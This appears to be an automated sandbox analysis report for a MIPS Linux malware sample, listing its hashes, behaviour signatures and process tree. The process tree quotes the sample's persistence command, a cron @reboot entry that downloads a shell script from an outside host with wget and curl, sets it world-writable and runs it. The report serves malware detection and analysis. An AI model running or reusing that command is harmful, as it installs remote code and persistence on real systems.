Analysis

  • max time kernel
    151s
  • max time network
    142s
  • platform
    debian-12_mipsel
  • resource
    debian12-mipsel-20240221-en
  • resource tags

    arch:mipsel
    image:debian12-mipsel-20240221-en
    kernel:6.1.0-17-4kc-malta
    locale:en-us
    os:debian-12-mipsel
    system
  • submitted
    27-10-2024 02:54

General

  • Target

    cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf

  • Size

    87KB

  • MD5

    353a49ca2c9b8b35fb036b2de1587fc4

  • SHA1

    e5cd1ab8dc2c224a5b82113a41ec46479895ae27

  • SHA256

    cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3

  • SHA512

    8a47f0d0a8899d153cf80d5579d7ca8f81b9efe9daf93a2f60f72d5ad1ed77a360f3ff6f93cad6b016a52ec6a6f76b94bf2d427f6d9eda0bc5f7cf609e6fd484

  • SSDEEP

    1536:GJTjy914iDyIV6n30taWKqlpbfc/SLuZ++5+BJoK+mcS/:GJTj614NNczc/0ublmx

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Renames itself 1 IoCs
  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Changes its process name 1 IoCs
  • Reads runtime system information 19 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf
    /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf
    1⤵
    • Renames itself
    • Changes its process name
    • Reads runtime system information
    PID:744
    • /bin/sh
      sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      2⤵
      • File and Directory Permissions Modification
      PID:746
      • /usr/bin/crontab
        crontab -
        3⤵
        • Creates/modifies Cron job
        PID:750
      • /usr/bin/crontab
        crontab -l
        3⤵
        PID:751

Network

MITRE ATT&CK Enterprise v15


Downloads

  • /var/spool/cron/crontabs/tmp.wB9D8g

    Filesize

    306B

    MD5

    bfd2089040b748f688b70470021d4d43

    SHA1

    c2a6fac8ce436a014bb4149d14d7853259b9323c

    SHA256

    cfb81f43363ede429f69a6c15d63fbfdb87246bd92fc6a55a189c1001bfb4b3b

    SHA512

    4aee0c647992fff8bc38624556617e8b78523f37f9169ecc32dbc303821881cf90f1fdccc9add3cfc06b6089a8f8e17878173f132a16db77cb152869c2ea487e